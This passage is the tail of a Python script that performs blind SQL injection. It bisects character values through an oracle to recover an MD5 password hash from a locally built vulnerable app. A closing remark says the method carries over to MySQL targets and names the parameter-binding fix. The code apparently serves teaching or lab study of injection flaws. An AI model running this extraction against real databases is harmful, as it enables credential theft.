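            if oracle(view, rid, position, mid):
                lo = mid + 1
            else:
                hi = mid
        recovered.append(chr(lo))
    return "".join(recovered), probes


if __name__ == "__main__":
    app = build_vulnerable_app()
    digest, n = extract_hash(app, "10")
    print(f"[~] MD5-Hash: {digest} ({n} probes)")
```

The same bisection works unchanged for the Perl scripts' targets by swapping sqlite_probe for mysql_probe and MARKER for each script's $regexp; the only change needed on the fix side is the one the view() comment names, binding the id as a parameter instead of concatenating it.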